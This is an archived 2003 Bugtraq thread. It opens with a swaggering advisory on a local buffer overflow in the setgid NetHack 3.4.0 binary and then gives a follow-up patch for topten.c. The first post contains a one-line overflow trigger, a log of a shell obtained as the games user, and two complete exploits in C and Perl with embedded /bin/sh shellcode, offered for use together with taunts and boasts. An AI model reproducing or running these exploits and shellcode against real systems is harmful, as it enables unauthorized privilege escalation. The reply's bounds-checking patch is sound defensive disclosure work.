90137 2003-02-10 16:50 /155 rader/ <tsao_4sh0@hushmail.com>
Importerad: 2003-02-10 16:50 av Brevbäraren
Extern mottagare: phc@hushmail.com
Extern mottagare: bugtraq@securityfocus.net
Extern mottagare: submit@packetstormsecurity.org
Mottagare: Bugtraq (import) <3451>
Ärende: #!ICadv-02.09.03: nethack 3.4.0 local buffer overflow
------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
###################################################
/usr/games/lib/nethackdir/nethack - LOCALLY EXPLOITABLE BUFFER
try th1s: nethack -s `perl -e "print 'A' x 1000"`
nethack.RPM package for redhat 8 is installed SETUID GAMES!@)~*
ther pre compiled b1nz for come for Amiga, Atari, Linux, Mac, Msdos
OS/2, Windows. br0 u can even dl source and own it on *BSD, System V,
Solaris, HP-UX, BeOS and VMS! How tight is th1s w4r3z y0
thatz right, we can snatch games prives.. this are highly sought
after privz.. with th1s we can do stuff like.. writing our own
highscore files & such.. use it to impress your friends.. u will be
the ULTIMATE NETHACKER!
ch3ck th1s:
[tsao@c:\ tmp]$ ./n 224 400
shellcode at 159->220
Using bffff6d8
Cannot find any current entries for )���۳
F�^FF
V
1��/bin/sh�
Call is: nethack -s [-v] [-role] [maxrank] [playernames]
sh-2.05b$ id
uid=12(games) gid=500(tsao) groups=500(tsao)
to all the people who think this is lame: ANY PRIVILEDGE ESCALATION IS
BAD BUSINESS!
greets: #!IC@EFNET / d4yj4y(lub yew bro.. thnx for help with C code)
greets: The-Rev - that regedit question was da b0mb. bizz0mb.
dis: #phrack@EFNET / the_ut -- I told you guys i was skilled & could code.
Attached is a C & PERL exploit, this is incase you do not have a C
compiler. I cover all the bases for u.
stay tuned for ftpd/apache warez, im pumping out more 0day than
the_ut pumpz out lame questionz to test my skillz..
p.s [tsao@c:\ tmp]# ssh -l tsao4sh0 phrack.ru -p 31337
[root@phc /]# WHOZ THE UNIX TERRORIST NOW ?
p.p.s im gonna drop 7350 warez soon, year of the leak bitchez.
p.p.p.s squashing bugz is fun!
attached: nethacker.c / nethacker.pl
<cut-me-here!!!!!!!! nethacker.c cut-me-here!!!!!!!>
/*
tsao@efnet #!IC@efnet 2k3
thnx to aleph1 for execve shellcode &
davidicke for setreuid() shellcode
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char code[] =
"\x29\xc4\x31\xc0\x31\xc9\x31\xdb\xb3\x0c\x89\xd9\xb0\x46\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long sp(void) {
__asm__("movl %esp,%eax");
}
int main(int argc, char **argv) {
char *p;
int i, off;
p = malloc(sizeof(char) * atoi(argv[1]));
memset(p,0x90,atoi(argv[1]));
off = 220 - strlen(code);
printf("shellcode at %d->%d\n",off,off+strlen(code));
for(i=0;i<atoi(argv[1]);i++)
p[i+off] = code[i];
*(long *) &p[220] = sp() - atoi(argv[2]);
printf("Using %x\n",sp() - atoi(argv[2]));
execl("/usr/games/lib/nethackdir/nethack","nethack","-s",p,0);
perror("wtf");
}
<eof-nethacker.c!!!!!!! eof-nethacker.c!!!!!!>
<cut-me-here nethacker.pl !!!!!! cut-me-here nethacker.pl!!!!>
#!/usr/bin/perl -w
#
# tsao@efnet #!IC@efnet 2k3
# thnx to aleph1 for execve shellcode
# davidicke for setreuid() shellcode
$sc .=
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x0c\x31\xc0\xb0\x46\xcd\x80\x31\xdb";
$sc .=
"\x31\xc9\xb3\x0c\xb1\x0c\x31\xc0\xb0\x46\xcd\x80\xeb\x24\x5e\x8d\x1e\x89\x5e";
$sc .=
"\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12";
$sc .=
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff\x2f\x62";
$sc .= "\x69\x6e\x2f\x73\x68\x01";
for ($i = 0; $i < (224 - (length($sc)) - 4); $i++) {
$buf .= "\x90";
}
$buf .= $sc;
$buf .= "\xd2\xf8\xff\xbf";
exec("/usr/games/lib/nethackdir/nethack -s '$buf'");
<eof-nethacker.pl!!!!! eof-nethacker.pl!!!!>
tsao@efnet #!IC@efnet 2k3
tsao - owning ^ x.25 like none other.. fuq u jj
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wl4EARECAB4FAj5GANIXHHRzYW9fNHNoMEBodXNobWFpbC5jb20ACgkQj944mCS4M3Xk
SgCgv5FJ4mn7EhQmO3kIKjiNHn8Ze9kAn2Bt46OsJepEYFlAlSe/ttoZiFpD
=GlgW
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
(90137) / <tsao_4sh0@hushmail.com>/-------(Ombruten)
90237 2003-02-11 17:09 /48 rader/ Peter Pentchev <roam@ringlet.net>
Importerad: 2003-02-11 17:09 av Brevbäraren
Extern mottagare: tsao_4sh0@hushmail.com
Mottagare: Bugtraq (import) <3468>
Kommentar till text 90137 av <tsao_4sh0@hushmail.com>
Ärende: Re: #!ICadv-02.09.03: nethack 3.4.0 local buffer overflow
------------------------------------------------------------
On Sat, Feb 08, 2003 at 11:18:49PM -0800, tsao_4sh0@hushmail.com wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> ###################################################
>
> /usr/games/lib/nethackdir/nethack - LOCALLY EXPLOITABLE BUFFER
>
> try th1s: nethack -s `perl -e "print 'A' x 1000"`
Here is a bandaid that I just committed to the FreeBSD Ports Collection
and also submitted to the NetHack developers. I say 'bandaid', because
there might be a lot of other strcat() weirdnesses in the NetHack source
:(
The patch is also available at
http://people.FreeBSD.org/~roam/devel/nethack/topten.c.patch
G'luck,
Peter
--
Peter Pentchev roam@ringlet.net roam@FreeBSD.org
PGP key: http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553
I've heard that this sentence is a rumor.
--- src/topten.c Thu Mar 21 01:43:19 2002
+++ src/topten.c Tue Feb 11 15:36:23 2003
@@ -855,8 +855,15 @@
if (playerct < 1) Strcat(pbuf, "you.");
else {
if (playerct > 1) Strcat(pbuf, "any of ");
- for (i = 0; i < playerct; i++) {
- Strcat(pbuf, players[i]);
+ for (i = 0; i < playerct && strlen(pbuf) < sizeof(pbuf) - 2;
+ i++) {
+ size_t len = strlen(pbuf), rest;
+ if (strlen(players[i]) > sizeof(pbuf) - len - 2) {
+ rest = sizeof(pbuf) - strlen(pbuf) - 2;
+ memcpy(pbuf + len, players[i], rest);
+ pbuf[len + rest] = '\0';
+ } else
+ Strcat(pbuf, players[i]);
if (i < playerct-1) {
if (players[i][0] == '-' &&
index("pr", players[i][1]) && players[i][2] == 0)
(90237) /Peter Pentchev <roam@ringlet.net>/---------
Bilaga (application/pgp-signature) i text 90238
90238 2003-02-11 17:09 /8 rader/ Peter Pentchev <roam@ringlet.net>
Importerad: 2003-02-11 17:09 av Brevbäraren
Extern mottagare: tsao_4sh0@hushmail.com
Mottagare: Bugtraq (import) <3469>
Bilaga (text/plain) till text 90237
Ärende: Bilaga till: Re: #!ICadv-02.09.03: nethack 3.4.0 local buffer overflow
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (FreeBSD)
iD8DBQE+SQPc7Ri2jRYZRVMRAk1FAJ9pSXvbQhwarvS12JrL381v096JJwCeP83B
aBGDAkBKf7UsQOI8KpTvTlA=
=XZso
-----END PGP SIGNATURE-----
(90238) /Peter Pentchev <roam@ringlet.net>/---------